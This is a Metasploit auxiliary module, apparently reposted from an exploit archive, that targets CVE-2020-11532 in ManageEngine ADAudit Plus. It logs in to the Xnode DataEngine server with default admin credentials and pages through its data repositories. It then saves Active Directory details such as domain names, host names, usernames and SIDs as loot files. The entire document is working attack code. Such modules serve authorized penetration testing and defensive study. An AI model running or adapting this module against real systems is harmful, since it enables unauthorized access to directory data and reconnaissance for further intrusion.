Share
## https://sploitus.com/exploit?id=PACKETSTORM:180693
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::ManageEngineXnode  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::Tcp  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(_info = {})  
super(  
'Name' => 'ManageEngine ADAudit Plus Xnode Enumeration',  
'Description' => %q{  
This module exploits default admin credentials for the DataEngine  
Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in  
order to dump the contents of Xnode data repositories (tables),  
which may contain (a limited amount of) Active Directory  
information including domain names, host names, usernames and SIDs.  
This module can also be used against patched ADAudit Plus versions  
if the correct credentials are provided.  
  
By default, this module dumps only the data repositories and fields  
(columns) specified in the configuration file (set via the  
CONFIG_FILE option). The configuration file is also used to  
add labels to the values sent by Xnode in response to a query.  
  
It is also possible to use the DUMP_ALL option to obtain all data  
in all known data repositories without specifying data field names.  
However, note that when using the DUMP_ALL option, the data won't be labeled.  
  
This module has been successfully tested against ManageEngine  
ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and  
ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.  
},  
'Author' => [  
'Sahil Dhar', # discovery and PoC (for authentication only)  
'Erik Wynter', # @wyntererik - additional research and Metasploit  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2020-11532'],  
['PACKETSTORM', '157609'],  
],  
)  
register_options [  
OptString.new('CONFIG_FILE', [false, 'YAML file specifying the data repositories (tables) and fields (columns) to dump', File.join(Msf::Config.data_directory, 'exploits', 'manageengine_xnode', 'CVE-2020-11532', 'adaudit_plus_xnode_conf.yaml')]),  
OptBool.new('DUMP_ALL', [false, 'Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.', false]),  
Opt::RPORT(29118)  
]  
end  
  
def config_file  
datastore['CONFIG_FILE'].to_s # in case it is nil  
end  
  
def dump_all  
datastore['DUMP_ALL']  
end  
  
def username  
datastore['USERNAME']  
end  
  
def password  
datastore['PASSWORD']  
end  
  
def check  
# create a socket  
res_code, sock_or_msg = create_socket_for_xnode(rhost, rport)  
if res_code == 1  
return Exploit::CheckCode::Unknown(sock_or_msg)  
end  
  
@sock = sock_or_msg  
  
# perform basic checks to see if Xnode is running and if so, if it is exploitable  
res_code, res_msg = xnode_check(@sock, username, password)  
case res_code  
when 0  
return Exploit::CheckCode::Appears(res_msg)  
when 1  
return Exploit::CheckCode::Safe(res_msg)  
when 2  
return Exploit::CheckCode::Unknown(res_msg)  
else  
return Exploit::CheckCode::Unknown('An unexpected error occurred whilst running this module. Please raise a bug ticket!')  
end  
end  
  
def run  
# check if we already have a socket, if not, create one  
unless @sock  
# create a socket  
res_code, sock_or_msg = create_socket_for_xnode(rhost, rport)  
if res_code == 1  
fail_with(Failure::Unreachable, sock_or_msg)  
end  
@sock = sock_or_msg  
end  
  
# get the Xnode health status  
health_warning_message = 'Received unexpected response while trying to obtain the Xnode "de_health" status. Enumeration may not work.'  
res_code, res_health = get_response(@sock, action_admin_health, health_warning_message, 'de_health')  
  
if res_code == 0  
if res_health['response']['de_health'] == 'GREEN'  
print_status('Obtained expected Xnode "de_health" status: "GREEN".')  
else  
print_warning("Obtained unexpected Xnode \"de_health\" status: \"#{res_health['response']['de_health']}\"")  
end  
end  
  
# get the Xnode info  
info_warning_message = 'Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.'  
res_code, res_info = get_response(@sock, action_xnode_info, info_warning_message)  
  
if res_code == 0  
if res_info['response'].keys.include?('xnode_version')  
print_status("Target is running Xnode version: \"#{res_info['response']['xnode_version']}\".")  
else  
print_warning('Failed to obtain the Xnode version.')  
end  
  
if res_info['response'].keys.include?('xnode_installation_path')  
print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")  
else  
print_warning('Failed to obtain the Xnode installation path.')  
end  
end  
  
# obtain the total number of records and the min and max record ID numbers for each repo, which is necessary to enumerate the records  
repo_record_info_hash = {}  
ad_audit_plus_data_repos.each do |repo|  
# send a general query, which should return the "total_hits" parameter that represents the total record count  
res_code, res = get_response(@sock, action_dr_search(repo))  
total_hits = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'total_hits')  
# check if total_hits is nil, as that means process_dr_search failed and we should skip to the next repo  
next if total_hits.nil?  
  
total_hits = total_hits.first  
  
# use "aggr" with the "min" specification for the UNIQUE_ID field in order to obtain the minimum value for this field, i.e. the oldest available record  
aggr_min_query = { 'aggr' => { 'min' => { 'field' => 'UNIQUE_ID' } } }  
res_code, res = get_response(@sock, action_dr_search(repo, ['UNIQUE_ID'], aggr_min_query))  
aggr_min = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'aggr_min')  
# check if aggr_min is nil, as that means process_dr_search failed and we should skip to the next repo  
next if aggr_min.nil?  
  
aggr_min = aggr_min.first  
  
# use "aggr" with the "max" specification for the UNIQUE_ID field in order to obtain the maximum value for this field, i.e. the most recent record  
aggr_max_query = { 'aggr' => { 'max' => { 'field' => 'UNIQUE_ID' } } }  
res_code, res = get_response(@sock, action_dr_search(repo, ['UNIQUE_ID'], aggr_max_query))  
aggr_max = process_dr_search(res, res_code, repo, ['UNIQUE_ID'], 'aggr_max')  
# check if aggr_max is nil, as that means process_dr_search failed and we should skip to the next repo  
next if aggr_max.nil?  
  
aggr_max = aggr_max.first  
  
print_good("Data repository #{repo} contains #{total_hits} records with ID numbers between #{aggr_min} and #{aggr_max}.")  
  
repo_record_info_hash[repo] = {  
'total_hits' => total_hits.to_i,  
'aggr_min' => aggr_min.to_i,  
'aggr_max' => aggr_max.to_i  
}  
end  
  
# check if we found any repositories that contained any data  
if repo_record_info_hash.empty?  
print_error('None of the repositories specified contained any data!')  
return  
end  
  
if dump_all  
data_to_dump = ad_audit_plus_data_repos  
else  
data_to_dump = grab_config(config_file)  
  
case data_to_dump  
when config_status::CONFIG_FILE_DOES_NOT_EXIST  
fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")  
when config_status::CANNOT_READ_CONFIG_FILE  
fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")  
when config_status::DATA_TO_DUMP_EMPTY  
fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")  
when config_status::DATA_TO_DUMP_WRONG_FORMAT  
fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")  
end  
end  
  
# try and dump the database tables Xnode has access to  
data_to_dump.each do |repo, fields|  
if fields.blank? && !dump_all  
print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")  
next  
end  
  
# check if we actually found any records for the repo  
next unless repo_record_info_hash.include?(repo)  
  
total_hits = repo_record_info_hash[repo]['total_hits']  
id_range_lower = repo_record_info_hash[repo]['aggr_min']  
max_id = repo_record_info_hash[repo]['aggr_max']  
  
if total_hits.nil? || id_range_lower.nil? || max_id.nil?  
print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")  
next  
end  
  
if total_hits == 0  
print_error("No hits found for #{repo}!")  
next  
end  
  
id_range_upper = id_range_lower + 9  
query_ct = 0  
  
results = []  
print_status("Attempting to request #{total_hits} records for data repository #{repo} between IDs #{id_range_lower} and #{max_id}. This could take a while...")  
hit_upper_limit = false  
until hit_upper_limit  
# build a custom query for the unique_id range  
custom_query = { 'query' => "UNIQUE_ID:[#{id_range_lower} TO #{id_range_upper}]" }  
query = action_dr_search(repo, fields, custom_query)  
res_code, res = get_response(@sock, query)  
partial_results = process_dr_search(res, res_code, repo, fields)  
results += partial_results unless partial_results.nil?  
  
query_ct += 1  
if query_ct % 5 == 0  
print_status("Processed #{query_ct} queries (max 10 records per query) so far. The last queried record ID was #{id_range_upper}. The max ID is #{max_id}...")  
end  
  
# check if we have already queried the record with the maximum ID value, if so, we're done  
if id_range_upper == max_id  
hit_upper_limit = true  
else  
id_range_lower += 10  
id_range_upper += 10  
# make sure that id_range_upper never exceeds the maximum ID value  
if id_range_upper > max_id  
id_range_upper = max_id  
end  
end  
end  
  
if results.empty?  
print_error("No non-empty records were obtained for #{repo}.")  
next  
end  
  
# shorten the data repository name (if necessary) so that it can be used as part of the eventual output file name  
outfile_part = "xnode_#{repo.gsub('Adap', '').gsub('AuditLog', 'audit').gsub('ADReplication', 'ADRepl').downcase}"  
path = store_loot(outfile_part, 'application/json', rhost, results.to_json, "#{repo}.json")  
print_good("Saving #{results.length} records from the #{repo} data repository to #{path}")  
end  
end  
end